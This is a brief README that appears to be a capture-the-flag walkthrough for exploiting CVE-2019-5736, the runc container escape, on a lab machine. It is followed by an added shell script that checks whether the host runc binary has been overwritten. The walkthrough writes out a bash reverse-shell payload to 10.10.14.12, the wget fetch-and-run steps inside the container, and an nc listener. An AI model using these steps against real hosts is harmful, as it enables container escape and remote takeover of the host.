🖥️ -k4u5h41- #️⃣ CVE-2019-5736

Usage:

The machine is vulnerable to CVE-2019-5736; follow the steps in Runc exploit (CVE-2019-5736). Download the file main.go and change the payload in the file to:

  var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

After that, run:

  go build main.go

Host an HTTP server:

  python3 -m http.server

Then open 3 terminals as below:

Terminal 1
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
  wget http://10.10.14.12/main
  chmod +x main
  ./main

Terminal 2
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

Terminal 3
  nc -nlvp 1234

Once you run ./main in the first SSH terminal, immediately run the second command in the second SSH terminal; you will then get the netcat reverse shell in terminal 3.
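A host-side integrity check for this scenario, as an added example that is not part of the original README: CVE-2019-5736 lets a process inside the container overwrite the host's runc binary, and the payload above is a shell script, so a runtime binary that no longer begins with the ELF magic, or no longer matches a SHA-256 recorded at install time, has been replaced. The function names and the path and digest arguments are assumptions.

```shell
#!/bin/sh
# Added defensive example; not code from the original README.
# Assumptions: you pass the host runtime path yourself (for example the
# output of `command -v runc`) and, optionally, a SHA-256 baseline that
# was recorded when the package was installed. Function names are hypothetical.

# Print what the file's leading bytes say it is: elf, script, missing or unknown.
classify_runtime_binary() {
    local path="$1" magic
    if [ ! -f "$path" ]; then
        echo "missing"
        return 0
    fi
    # First four bytes as lowercase hex, e.g. 7f454c46 for "\x7fELF".
    magic=$(head -c 4 "$path" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        7f454c46) echo "elf" ;;
        2321*)    echo "script" ;;   # "#!" shebang, like the payload above
        *)        echo "unknown" ;;
    esac
}

# Return 0 if the binary looks intact, 1 if it is not an ELF file,
# 2 if it is ELF but its digest differs from the supplied baseline.
audit_runtime_binary() {
    local path="$1" expected="${2:-}" kind actual
    kind=$(classify_runtime_binary "$path")
    if [ "$kind" != "elf" ]; then
        echo "ALERT: $path is '$kind', expected an ELF executable" >&2
        return 1
    fi
    if [ -n "$expected" ]; then
        actual=$(sha256sum "$path" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "ALERT: $path digest $actual differs from baseline" >&2
            return 2
        fi
    fi
    echo "OK: $path"
}

# Run the audit only when the script is given a path on the command line.
if [ "$#" -gt 0 ]; then
    audit_runtime_binary "$@"
fi
```

Run it from the host, not from inside a container, so the check reads the real runtime binary.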